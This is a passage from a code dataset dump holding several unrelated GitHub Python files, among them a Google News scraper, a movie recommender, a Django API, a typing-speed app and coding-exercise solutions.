ps4.init(queue.Queue())\n ps4.debug = 1\n ps4.listen()\n","repo_name":"dhruvm96/SocialDrones","sub_path":"cfcli/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31066122461","text":"with open(r\"D:\\New folder\\files\\New folder\\Python\\Day 13\\iris.csv\", \"r\") as iris_file:\r\n iris_data = iris_file.readlines()\r\n print(iris_data)\r\n\r\nirises = []\r\n\r\nfor row in iris_data[1:]:\r\n sepal_length, sepal_width, petal_length, petal_width, species = row.strip().split(\",\")\r\n\r\n irises.append({\r\n \"sepal_length\": sepal_length,\r\n \"sepal_width\": sepal_width,\r\n \"petal_length\": petal_length,\r\n \"petal_width\": petal_width,\r\n \"species\": species\r\n })\r\n\r\n\r\n#alternative way\r\nwith open(\"iris.csv\", \"r\") as iris_file:\r\n iris_data = iris_file.readlines()\r\n\r\nheaders = iris_data[0].strip().split(\",\")\r\nirises = []\r\n\r\nfor row in iris_data[1:]:\r\n iris = row.strip().split(\",\")\r\n iris_dict = dict(zip(headers, iris))\r\n\r\n irises.append(iris_dict)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"imxal/Python","sub_path":"Day 13/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33321811259","text":"\"\"\"\nRotina de extração de notícias da aba News do Google a partir de string de busca e dias de início e fim.\n\n\"\"\"\nimport datetime as DT\nimport logging\nimport os\nimport time\nfrom datetime import date\nfrom os import path\n\nimport pandas as pd\nfrom GoogleNews import GoogleNews\n\nfrom noticias_ner import config\nfrom noticias_ner.noticias.google import extrai_noticias_google\n\n\ndef __extrai_noticias_gnews(q, dia_inicio, dia_fim, num_limite_paginas=1, lang='pt-BR', sleep=1, tentativas=5):\n \"\"\"\n Retorna data frame com as notícias obtidas na aba News do Google\n\n Parâmetros\n ----------\n q : str\n String de busca\n\n data_inicio, dta_fim : datatime.Date\n Datas de início e fim para realização da busca\n\n num_limite_num_limite_paginas : int\n Número máxima de páginas que serão obtidas.\n\n lang : str\n Código da lingua para realização da busca (padrão pt-BR)\n\n sleep : int\n Número de segundos para esperar entre tentativas após cada erro de obtenção de página\n\n tentativas : int\n Número de tentativas de obnteção de uma página antes de se considerar a extração concluída\n\n Retorno\n -------\n resultados : DataFrame\n Dataframe com os reulstados de busca\n \"\"\"\n\n # String de busca formatado adequadamente para URL\n # q = urllib.parse.quote(q)\n\n # Strings com as datas no formato esperado pela lib GoogleNews\n formato_data = '%m/%d/%Y'\n dia_inicio_formatado = dia_inicio.strftime(formato_data)\n dia_fim_formatado = dia_fim.strftime(formato_data)\n\n # Instancia interface de busca ao Google News com idioma pt-BR e período adequado\n gn = GoogleNews(lang=lang, start=dia_inicio_formatado, end=dia_fim_formatado)\n\n # Inicializa lista para armazenar os resultados de busca\n resultados = []\n\n # Realiza busca da primeira página\n logger = logging.getLogger('covidata')\n logger.info(f'Buscando página 1')\n gn.search(q)\n resultados = resultados + gn.result()\n gn.clear()\n\n # Para a página 2 em diante (p2 corresponde ao índice 1)\n for i in range(2, num_limite_paginas + 1):\n\n logger.info(f'Buscando página {i}')\n\n # Busca a página\n gn.getpage(i)\n\n # Adiciona reusltado à lista\n resultados = resultados + gn.result()\n\n # Caso a consulta à página não tenha gerado resultados\n if gn.result() == []:\n logger.info(f'A consulta à página {i} não retornou nehnum resultado')\n\n # Diminui o contador de tentaivas\n tentativas = tentativas - 1\n logger.info(f'*** Há {tentativas} restantes ***')\n\n # Caso o número de tentativas tenha chegado a zero, interrompe a execução\n if tentativas < 1:\n break\n\n # Caso contrário\n else:\n # Pausa script por sleep segundos antes de buscar a próxima página\n logger.info(f'Execução interrompida por {sleep} segundos')\n time.sleep(sleep)\n\n # Apaga cache do resultado\n gn.clear()\n\n # Cria e retorna dataframe\n return pd.DataFrame(resultados)\n\n\ndef executar_busca(data_inicial, q):\n dia_inicio = __get_dia_inicio(data_inicial)\n dia_fim = date.today()\n\n # Número limite de páginas\n num_limite_paginas = 100\n\n df_google = extrai_noticias_google(q, dia_inicio)\n\n # Realiza busca\n df_gnews = __extrai_noticias_gnews(q, dia_inicio, dia_fim, num_limite_paginas=num_limite_paginas, sleep=10,\n tentativas=10)\n\n # Salva resultados\n if not path.exists(config.diretorio_dados):\n os.makedirs(config.diretorio_dados)\n\n df = pd.concat([df_google, df_gnews])\n caminho_arquivo_resultante = os.path.join(config.diretorio_dados, f'noticias_n_{len(df)}.xlsx')\n\n df.to_excel(caminho_arquivo_resultante)\n\n return caminho_arquivo_resultante, dia_inicio\n\n\ndef __get_dia_inicio(data_inicial):\n if not data_inicial:\n today = DT.date.today()\n dia_inicio = today - DT.timedelta(days=7)\n else:\n dia_inicio = date.fromisoformat(data_inicial)\n return dia_inicio\n","repo_name":"SecexSaudeTCU/noticias_ner","sub_path":"noticias_ner/noticias/gnews.py","file_name":"gnews.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"pt","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"71725173266","text":"\"\"\"\n每个点可以有四种颜色的选择,只要两个相邻点的颜色不同就行\n\n输入:n = 3, paths = [[1,2],[2,3],[3,1]]\n输出:[1,2,3]\n解释:\n花园 1 和 2 花的种类不同。\n花园 2 和 3 花的种类不同。\n花园 3 和 1 花的种类不同。\n因此,[1,2,3] 是一个满足题意的答案。其他满足题意的答案有 [1,2,4]、[1,4,2] 和 [3,2,1]\n\"\"\"\n\n\nclass Solution(object):\n def gardenNoAdj(self, N, paths):\n \"\"\"\n :type N: int\n :type paths: List[List[int]]\n :rtype: List[int]\n \"\"\"\n res = [0] * N\n neigh = [[] for _ in range(N)]\n \n # 每个点的相邻的点都记录起来\n for i, j in paths:\n neigh[i - 1].append(j - 1)\n neigh[j - 1].append(i - 1)\n\n for cur in range(N):\n # 当前i可以选择哪种花色\n flowers = [1, 2, 3, 4]\n for j in neigh[cur]:\n if res[j] in flowers:\n flowers.remove(res[j])\n\n # 反正剩出来的都可以选,随意选\n res[cur] = flowers[0]\n\n return res","repo_name":"Andrewlearning/Leetcoding","sub_path":"leetcode/Graph/二分图bipartition(图染色法)/1042m. 不邻接植花(图染色法).py","file_name":"1042m. 不邻接植花(图染色法).py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70134877586","text":"a = \"\\n\".join([\n \".W.\",\n \".W.\",\n \"...\"\n])\n\na = a.split('/n')\ndef make_2d (str):\n a = str.split('/n')\n new_a = []\n for x in a:\n new_a.append(list(x))\n return new_a\n","repo_name":"mjyrhee9/IB-Comp-Sci-Projects","sub_path":"bfs2d.py","file_name":"bfs2d.py","file_ext":"py","file_size_in_byte":170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43517188272","text":"# N행 M열의 표 A가 있고, 표의 각 칸에는 숫자가 하나씩 적혀있다.\r\n#\r\n# 연두는 서로 다른 1개 이상의 칸을 선택하려고 하는데, 행의 번호가 선택한 순서대로 등차수열을 이루고 있어야 하고, 열의 번호도 선택한 순서대로 등차수열을 이루고 있어야 한다. 이렇게 선택한 칸에 적힌 수를 순서대로 이어붙이면 정수를 하나 만들 수 있다.\r\n#\r\n# 연두가 만들 수 있는 정수 중에서 가장 큰 완전 제곱수를 구해보자. 완전 제곱수란 어떤 정수를 제곱한 수이다.\r\n\r\nimport math\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\nN, M = map(int, input().split())\r\ntable = [input().strip() for _ in range(N)]\r\nanswer = -1\r\n\r\ndef func(x):\r\n x = int(x)\r\n num = math.sqrt(x)\r\n if int(num) * int(num) == x:\r\n return True\r\n return False\r\n\r\nif N == 1 and M == 1:\r\n result = int(''.join(map(str, table)))\r\n if func(result):\r\n print(result)\r\n else:\r\n print(answer)\r\nelse:\r\n for y in range(N):\r\n for x in range(M):\r\n for dy in range(-N + 1, N):\r\n for dx in range(-M + 1, M):\r\n num = \"\"\r\n current_y = y\r\n current_x = x\r\n if dx == 0 and dy == 0:\r\n continue\r\n while 0 <= current_x < M and 0 <= current_y < N:\r\n num += table[current_y][current_x]\r\n current_x += dx\r\n current_y += dy\r\n if func(num):\r\n answer = max(answer, int(num))\r\n print(answer)","repo_name":"dnwls16071/PS_Baekjoon","sub_path":"1000~1999/1025.py","file_name":"1025.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15582111383","text":"import numpy as np\nfrom sklearn.linear_model import LinearRegression\n\ndef exponentialRegression(closing):\n x = np.arange(1,len(closing) + 1).reshape((-1, 1))\n y_normalized = np.divide(closing, closing[0])\n y_ln = np.log(y_normalized)\n model = LinearRegression()\n model.fit(x, y_ln)\n scalar = np.exp(model.intercept_) * closing[0]\n base = np.power(np.exp(model.coef_)[0], 252)\n # annualReturn = (base - 1) * 100\n # equation = \"y = {}({})^x\".format(scalar, base,)\n rSquared = model.score(x, y_ln)\n return {\n \"scalar\": scalar,\n \"roi\": ((base - 1) * 100),\n # \"annualReturn\": annualReturn,\n # \"equation\": equation,\n \"r2\": rSquared\n }\n","repo_name":"blakesanie/Stock-Analysis","sub_path":"regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36923199342","text":"import argparse\nimport movie_data\nimport content_recommender\n\n\ndef show_user_id_prompt():\n while True:\n try:\n user_id = int(input(\"Enter the desired user ID: \"))\n return user_id\n except ValueError:\n print(\"Please input integer only...\")\n\n\ndef print_user_profile(user_profile):\n sorted_profile = {k: v for k, v in sorted(user_profile.items(), key=lambda item: item[1], reverse=True)}\n for genre in sorted_profile:\n print('{0}: {1}'.format(genre, sorted_profile[genre]))\n\n\nif __name__ == \"__main__\":\n try:\n # Command line arguments\n # --user set the user_id for which to generate recommendations\n # --strategy strategy to be used in recommendation process\n # --sample set the number of randomly sampled movies used in recommendation process\n # (does not influence user profile creation)\n parser = argparse.ArgumentParser()\n parser.add_argument('--user', dest='user_id', type=int, default=-1,\n help='id of user to generate recommendations for')\n parser.add_argument('--strategy', dest='strategy', type=str, default='all',\n help='strategy to use for recommendations (overlap, popularity, count, all)')\n parser.add_argument('--sample', dest='sample_size', type=int, default=-1,\n help='set the number of randomly sampled movies used in recommendation process (does not '\n 'influence user profile creation)')\n\n args = parser.parse_args()\n # if user_id was not set via cl arguments then prompt user for input\n if args.user_id == -1:\n args.user_id = show_user_id_prompt()\n\n if args.strategy not in ('overlap', 'popularity', 'count', 'all'):\n raise ValueError('Strategy must be in (overlap, popularity, count, all)')\n\n print('Loading data...')\n md = movie_data.MovieData()\n # if sample size > actual movie count\n if md.get_movie_count() < args.sample_size:\n raise ValueError('Sample size must be smaller than user and movie count ({0})'\n .format(md.get_movie_count()))\n\n print('\\nUser has previously rated:')\n print(md.get_rated_movies_df(args.user_id)[['Title', 'Genres']])\n\n # create user profile and print\n recommender = content_recommender.ContentBasedRecommender(data=md, sample_size=args.sample_size)\n user_profile = recommender.get_user_profile(args.user_id)\n print('\\nUSER PROFILE:')\n print_user_profile(user_profile)\n\n print('\\nGenerating recommendations...')\n\n # recommendation strategy 1\n if args.strategy in ('overlap', 'all'):\n print('\\nRECOMMENDATIONS (OVERLAP):')\n df_recommendations = recommender.get_recommendations_overlap(args.user_id)\n print(df_recommendations[['Title', 'Genres']].head(30))\n\n # recommendation strategy 2\n if args.strategy in ('popularity', 'all'):\n print('\\nRECOMMENDATIONS (POPULARITY):')\n df_recommendations = recommender.get_recommendations_popularity(args.user_id)\n print(df_recommendations[['Title', 'Genres']].head(30))\n\n # recommendation strategy 3\n if args.strategy in ('count', 'all'):\n print('\\nRECOMMENDATIONS (COUNT):')\n df_recommendations = recommender.get_recommendations_count(args.user_id)\n print(df_recommendations[['Title', 'Genres']].head(30))\n\n except (ValueError, KeyError) as e:\n print('Error: ' + str(e))\n except:\n print('unknown error occurred')\n","repo_name":"elsantner/recommender-systems-assignments","sub_path":"assignment04/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41859303670","text":"from helpers import analytics, primes\nanalytics.monitor()\n\nlimit = int(1e6)\n\ndef main(limit):\n phi = primes.totients(limit)\n return max(range(1,len(phi)), key=lambda i:i/phi[i])\n\nprint(main(limit), analytics.lap(), analytics.maxMem())","repo_name":"Phyisis/Problems","sub_path":"src/1-100/P069.py","file_name":"P069.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"34609675666","text":"from distutils.core import setup\nimport os\n\nreadme_fname = os.path.join(os.path.dirname(__file__), \"README.rst\")\nreadme_text = open(readme_fname).read()\n\nsetup(name=\"ftptool\", version=\"0.7.1\",\n url=\"https://github.com/bloggse/ftptool\",\n description=\"Higher-level interface to ftplib\",\n author=\"Blogg Esse AB\",\n author_email=\"teknik@blogg.se\",\n requires=[\"six\"],\n long_description=readme_text,\n py_modules=[\"ftptool\"])\n","repo_name":"bloggse/ftptool","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"5786255722","text":"import json\n\nclass Project:\n def __init__(self, title, description, due_date):\n self.title = title\n self.description = description\n self.due_date = due_date\n self.tasks = []\n\n def add_task(self, task):\n self.tasks.append(task)\n\n def remove_task(self, task):\n self.tasks.remove(task)\n\n def complete_task(self, task):\n task.complete()\n\n def get_completed_tasks(self):\n return [task for task in self.tasks if task.completed]\n\n def get_incomplete_tasks(self):\n return [task for task in self.tasks if not task.completed]\n\n def display_tasks(self):\n print(\"Aktualne zadania w projekcie:\")\n print(\"Tytuł\\tOpis\\tPriorytet\\tStatus\")\n for task in self.tasks:\n completed = \"Zakończone\" if task.completed else \"Nie zakończone\"\n print(f\"{task.title}\\t{task.description}\\t{task.priority}\\t{completed}\")\n print(\"--------------------\")\n\nclass Task:\n def __init__(self, title, description, priority, completed=False):\n self.title = title\n self.description = description\n self.priority = priority\n self.completed = completed\n\n def complete(self):\n self.completed = True\n\n def edit(self, new_title, new_description, new_priority):\n self.title = new_title\n self.description = new_description\n self.priority = new_priority\n\nclass ProjectManager:\n def __init__(self):\n self.projects = []\n\n def create_project(self, title, description, due_date):\n project = Project(title, description, due_date)\n self.projects.append(project)\n return project\n\n def remove_project(self, project):\n self.projects.remove(project)\n\n def save_projects(self, filename):\n data = []\n for project in self.projects:\n project_data = {\n \"title\": project.title,\n \"description\": project.description,\n \"due_date\": project.due_date,\n \"tasks\": [\n {\n \"title\": task.title,\n \"description\": task.description,\n \"priority\": task.priority,\n \"completed\": task.completed\n }\n for task in project.tasks\n ]\n }\n data.append(project_data)\n\n with open(filename, \"w\") as file:\n json.dump(data, file, indent=4)\n\n def load_projects(self, filename):\n with open(filename, \"r\") as file:\n data = json.load(file)\n\n self.projects = []\n for project_data in data:\n project = Project(project_data[\"title\"], project_data[\"description\"], project_data[\"due_date\"])\n for task_data in project_data[\"tasks\"]:\n task = Task(task_data[\"title\"], task_data[\"description\"], task_data[\"priority\"])\n task.completed = task_data[\"completed\"]\n project.add_task(task)\n\n self.projects.append(project)\n\ndef save_tasks(tasks, filename):\n with open(filename, 'w') as file:\n json.dump(tasks, file)\n\ndef load_tasks(filename):\n try:\n with open(filename, 'r') as file:\n return json.load(file)\n except FileNotFoundError:\n return []\n\nproject_manager = ProjectManager()\n\nproject1 = project_manager.create_project(\"Aplikacja do zarządzania zadaniami\", \"Aplikacja webowa do śledzenia zadań\", \"2023-06-30\")\n\ntasks = load_tasks('tasks.json')\nfor task_data in tasks:\n task = Task(task_data['title'], task_data['description'], task_data['priority'], task_data['completed'])\n project1.add_task(task)\n\ndef add_new_task(project):\n title = input(\"Podaj tytuł zadania: \")\n description = input(\"Podaj opis zadania: \")\n priority = input(\"Podaj priorytet zadania: \")\n task = Task(title, description, priority)\n project.add_task(task)\n print(\"Dodano nowe zadanie:\")\n print(\"Tytuł:\", task.title)\n print(\"Opis:\", task.description)\n print(\"Priorytet:\", task.priority)\n print(\"--------------------\")\n\n\nwhile True:\n command = input(\"Wprowadź komendę (add - dodaj nowe zadanie, delete - usuń zadanie, complete - oznacz zadanie jako zakończone, display - wyświetl zadania, quit - wyjście): \")\n if command == \"add\":\n add_new_task(project1)\n elif command == \"delete\":\n task_title = input(\"Podaj tytuł zadania do usunięcia: \")\n for task in project1.tasks:\n if task.title == task_title:\n project1.remove_task(task)\n print(f\"Usunięto zadanie o tytule: {task_title}\")\n break\n else:\n print(\"Zadanie o podanym tytule nie zostało znalezione.\")\n elif command == \"complete\":\n task_title = input(\"Podaj tytuł zadania do oznaczenia jako zakończone: \")\n for task in project1.tasks:\n if task.title == task_title:\n task.complete()\n print(f\"Zadanie o tytule {task_title} zostało oznaczone jako zakończone.\")\n break\n else:\n print(\"Zadanie o podanym tytule nie zostało znalezione.\")\n elif command == \"display\":\n project1.display_tasks()\n elif command == \"quit\":\n\n tasks = []\n for task in project1.tasks:\n task_data = {\n 'title': task.title,\n 'description': task.description,\n 'priority': task.priority,\n 'completed': task.completed\n }\n tasks.append(task_data)\n save_tasks(tasks, 'tasks.json')\n\n print(\"Program zakończony.\")\n break\n","repo_name":"Seppyo/planerProjektow","sub_path":"planerZadań.py","file_name":"planerZadań.py","file_ext":"py","file_size_in_byte":5663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5006077652","text":"import random\n\n# A stone of mass 0.05 kg is thrown vertically upwards. Give the direction and magnitude of the net force on the pebble,\n#(a) during its upward motion,\n#(b) during its downward motion,\n#(c) at the highest point where it is momentarily at rest. \n# Do your answers change if the pebble was thrown at an angle of 45° with the horizontal direction\n\n# Give the magnitude and direction of the net force acting on a stone of mass 0.1 kg,\n#(a) just after it is dropped from the window of a stationary train,\n#(b) just after it is dropped from the window of a train running at a constant velocity of 36 km/ h,\n#(c) just after it is dropped from the window of a train accelerating with 1 ms-2,\n#(d) lying on the floor of a train which is accelerating with 1 m s~2, the stone being at rest relative to the train.\n\n# A rocket with a lift-off mass 20,000 kg is blasted upwards with an initial acceleration of 5.0 ms-2. Calculate the initial thrust (force) of the blast.\n\nqns = open('./questions.txt', 'w') \nans = open('./answers.txt','w')\nno_of_samples = 2500000\n# no_of_samples = 30\n\nfor i in range(no_of_samples):\n type = random.randint(1,5)\n if type == 1 or type == 3:\n m = random.randint(1,200)\n v = random.randint(1,200)\n angle = random.randint(0,90)\n q = \"A stone of mass \"+str(m)+\" kg is thrown vertically upwards with a velocity of \"+str(v)+\" ms-1. Give the direction and magnitude of the net force on the stone,\"\n t2 = random.randint(1,3)\n if t2 == 1:\n q = q + \" during its upward motion, \"\n elif t2 == 2:\n q = q + \" during its downward motion, \"\n else:\n q = q + \" at the highest point where it is momentarily at rest, \"\n q = q + \" do the answer change if the stone was thrown at an angle of \"+str(angle)+\" degree with the horizontal direction?\\n\"\n a = str(m*10)+\" newton, no answer does not change in 2nd case also.\\n\"\n elif type == 2 or type == 4:\n m = random.randint(10,2000)\n q = \"Give the magnitude and direction of the net force acting on a stone of mass \"+str(m)+\" g,\"\n a = str(round(m/100,1))+\" newton, vertically downwards\\n\"\n t2 = random.randint(1,5)\n if t2 == 1:\n l = random.randint(100,2000)\n q = q + \" just after it is dropped from the window of a stationary train of length \"+str(l)+\" m?\\n\"\n elif t2 == 2:\n v = random.randint(1,2000)\n q = q + \" just after it is dropped from the window of a train running at a constant velocity of \"+str(v)+\" ms-1?\\n\"\n elif t2 == 3:\n acc = random.randint(1,2000)\n q = q + \" just after it is dropped from the window of a train accelerating with \"+str(acc)+\" ms-2?\\n\"\n else:\n acc = random.randint(10,2000)\n q = q + \" lying on the floor of a train which is accelerating with \"+str(acc)+\" ms-2, the stone being at rest relative to the train?\\n\"\n a = str(round((m*acc)/1000,1)) + \" newton, along the direction of motion of train\\n\"\n else:\n m = random.randint(1000,20000)\n acc = random.randint(20,300)\n q = \"A rocket with a lift-off mass \"+str(m)+\" kg is blasted upwards with an initial acceleration of \"+str(acc)+\" ms-2. Calculate the initial thrust (force) of the blast.\\n\"\n a = str(m*a) + \" newton\\n\"\n qns.write(q)\n ans.write(a)\n # print(q)\n # print(a)\nqns.close()\nans.close()","repo_name":"misterpawan/scimat2","sub_path":"science/LawsOfMotion/Force/Force.py","file_name":"Force.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"8579654026","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .models import Personaje\nfrom .serializers import PersonajeSerializer\n\n\nclass PersonajeList(APIView):\n def get(self, request):\n personajes = Personaje.objects.all()\n serializer = PersonajeSerializer(personajes, many=True)\n return Response(serializer.data)\n\n def post(self, request):\n serializer = PersonajeSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass PersonajeDetail(APIView):\n def get_object(self, pk):\n try:\n return Personaje.objects.get(pk=pk)\n except Personaje.DoesNotExist:\n raise Http404\n\n def get(self, request, pk):\n snippet = self.get_object(pk)\n serializer = PersonajeSerializer(snippet)\n return Response(serializer.data)\n\n def put(self, request, pk):\n snippet = self.get_object(pk)\n serializer = PersonajeSerializer(snippet, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk):\n snippet = self.get_object(pk)\n snippet.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n","repo_name":"RenatoPeG/CF_Server","sub_path":"cholofighter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7814827767","text":"import sys\nsys.stdin = open('input.txt')\n\nT = int(input())\ndr = [-1, 1, 0, 0]\ndc = [0, 0, -1, 1]\n\n\ndef gravity(arr):\n for c in range(W):\n s = []\n for r in range(H):\n if arr[r][c]:\n s.append(arr[r][c])\n arr[r][c] = 0\n h = H-1\n while s:\n arr[h][c] = s.pop()\n h -= 1\n\n\ndef shot(row, col, arr1):\n stack = [(row, col)]\n while stack:\n r, c = stack.pop()\n if arr1[r][c] > 1:\n for i in range(4):\n nr, nc = r + dr[i], c + dc[i]\n for j in range(arr1[r][c] - 1):\n if 0 <= nr < H and 0 <= nc < W:\n if arr1[nr][nc] > 1:\n stack.append((nr, nc))\n else:\n arr1[nr][nc] = 0\n nr, nc = nr + dr[i], nc + dc[i]\n else:\n break\n arr1[r][c] = 0\n gravity(arr1)\n\ndef remains(arr):\n cnt = 0\n for c in range(W):\n for r in range(H-1, -1, -1):\n if not arr[r][c]:\n break\n cnt += 1\n return cnt\n\ndef dfs(idx, arr):\n global bricks\n if not bricks:\n return\n if idx == N:\n res = remains(arr)\n if res < bricks:\n bricks = res\n return\n\n for w in range(W):\n arr1 = [list(arr[_]) for _ in range(H)]\n for h in range(H):\n if arr1[h][w]:\n shot(h, w, arr1)\n if not remains(arr1):\n bricks = 0\n return\n dfs(idx+1, arr1)\n break\n\nfor tc in range(1, T+1):\n N, W, H = map(int, input().split())\n matrix = [list(map(int, input().split())) for i in range(H)]\n bricks = 987654321\n dfs(0, matrix)\n print('#{} {}'.format(tc, bricks))\n\n","repo_name":"asooso1/ssafy_algorithm","sub_path":"1012/박근석/5656_벽돌_깨기/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34536305847","text":"# Sort it first on the basis of age then on the basis of salary.\nimport pandas as pd\n\na = [{'name': 'a', 'salary': 20000, 'age': 25},\n {'name': 'b', 'salary': 25000, 'age': 23},\n {'name': 'c', 'salary': 34000, 'age': 25},\n {'name': 'd', 'salary': 13000, 'age': 30}]\n\ndf1 = pd.DataFrame(a)\nprint(df1.sort_values(by='age'))\nprint(df1.sort_values(by='salary'))","repo_name":"PiyushBadule/Python_Codes","sub_path":"Sort_on_basis_of_objects.py","file_name":"Sort_on_basis_of_objects.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15201476304","text":"from time import time\nfrom random import choice as ch\nimport tkinter as tk\n\nclass App:\n def __init__(self):\n with open('../text.txt', 'r', encoding='UTF-8') as f:\n self.text = ch(f.readlines())\n for chars in [['ё', 'е'], ['Ё', 'е'], ['«', '\"'], ['»', '\"']]:\n self.text.replace(chars[0], chars[1])\n\n self.startTime = self.endTime = self.start = self.wrong = self.characters = self.words = self.cpm = self.wpm = self.accuracy = self.cpmWpm = 0\n\n\n self.root = tk.Tk()\n root = self.root\n\n self.main_frm = tk.Frame(root, bg='#0d0124', width=550, height=350)\n main_frm = self.main_frm\n self.frm = tk.Frame(root, bg='#0b1f07', width=550, height=350)\n frm = self.frm\n\n self.lbl = tk.Label(main_frm, text='Начните печатать текст, чтобы начать', font=('Comic', 20), fg='green',\n bg='#0d0124')\n self.ent = tk.Entry(main_frm, textvariable=True, font=('Arial', 20), width=25, state='normal', fg='purple',\n bg='#0d0124')\n self.ent.insert(0, self.text)\n self.btn = tk.Button(main_frm, command=self.cpm_wpm, text='Завершить', font=('Times New Roman', 15), fg='green',\n bg='#0d0124')\n self.lbl_end = tk.Label(frm,\n text=f'Твой результат: \\ncpm: {self.cpm}\\nwpm: {self.wpm}\\nточность: {self.accuracy}%',\n font=('Sans', 30), fg='purple', bg='#0b1f07', width=22)\n self.again = tk.Button(frm, command=self.Again, text='Еще раз', font=('Times New Roman', 15), fg='yellow',\n bg='#0b1f07', width=7)\n self.quit = tk.Button(frm, command=self.Quit, text='Выйти', font=('Times New Roman', 15), fg='red',\n bg='#0b1f07', width=7)\n\n\n def Window(self):\n root = self.root\n root['bg'] = 'black'\n root.title('cpm_wpm')\n #root.geometry('550x350')\n #root.resizable(width=False, height=False)\n root.bind('', self.keyboard)\n\n root.mainloop()\n\n def Main_Frame(self):\n self.lbl.pack(padx=10, pady=50)\n self.ent.pack(padx=10, pady=10)\n self.btn.pack(pady=50)\n self.main_frm.grid()\n\n def Frame(self):\n frm = self.frm\n self.lbl_end.pack(pady=10)\n self.again.pack(pady=10)\n self.quit.pack(pady=10)\n frm.grid()\n\n def Text(self):\n with open('../text.txt', 'r', encoding='UTF-8') as f:\n self.text = ch(f.readlines())\n for chars in [['ё', 'е'], ['Ё', 'е'], ['«', '\"'], ['»', '\"']]:\n self.text.replace(chars[0], chars[1])\n self.ent.delete(0, 'end')\n self.ent.insert(0, self.text)\n\n def Again(self):\n self.startTime = self.endTime = self.start = self.wrong = self.characters = self.words = self.cpm = self.wpm = self.accuracy = self.cpmWpm = 0\n\n self.frm.grid_forget()\n self.main_frm.grid()\n\n self.Text()\n\n self.cpmWpm = 0\n\n def Quit(self):\n self.root.quit()\n\n def cpm_wpm(self):\n self.endTime = round(time())\n endTime = self.endTime\n startTime = self.startTime\n\n root = self.root\n\n\n inputTime = (endTime - startTime)\n\n characters = self.characters\n words = self.words\n wrong = self.wrong\n\n\n minLen = min(characters, len(self.text))\n try:\n cpm = round(characters / inputTime * 60)\n wpm = round(words / inputTime * 60)\n accuracy = 100 - round(wrong / minLen * 100)\n except ZeroDivisionError:\n cpm = 0\n wpm = 0\n accuracy = 0\n\n\n self.main_frm.grid_forget()\n self.cpm, self.wpm, self.accuracy = cpm, wpm, accuracy\n self.lbl_end.configure(text=f'Твой результат: \\ncpm: {self.cpm}\\nwpm: {self.wpm}\\nточность: {self.accuracy}%')\n self.Frame()\n\n self.cpmWpm = 1\n\n def keyboard(self, event):\n root = self.root\n if event.keysym == 'Escape':\n root.quit()\n elif event.keysym == 'Return':\n if self.cpmWpm == 0:\n self.cpmWpm = 1\n self.cpm_wpm()\n else:\n self.Again()\n try:\n if len(self.ent.get()) == 0:\n self.cpm_wpm()\n except:\n pass\n else:\n if event.char == self.ent.get()[0]:\n if self.start == 0:\n self.startTime = round(time())\n self.start = 1\n self.characters += 1\n if event.char == ' ':\n self.words += 1\n self.ent.delete(0, 1)\n else:\n if self.start == 1:\n self.wrong += 1\n\n def main(self):\n self.Main_Frame()\n self.Window()\n\n\nif __name__ == '__main__':\n App().main()\n","repo_name":"Kuso0taku/cpm_wpm","sub_path":"GUI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20231254447","text":"import string\nimport re\n# Part 1\nwith open('day3-input.txt', 'r') as f:\n rucksacks = f.readlines()\n\nvalue_string = '{}{}'.format(string.ascii_lowercase, string.ascii_uppercase)\n\nsum = 0\nfor r in [r.strip() for r in rucksacks]:\n compartment1 = r[0:int((len(r)+1)/2)]\n compartment2 = r[int((len(r)+1)/2):]\n share = list(set(compartment1).intersection(compartment2))\n sum += value_string.index(share[0]) + 1 # index starts at 0\nprint(sum)\n\n# Part 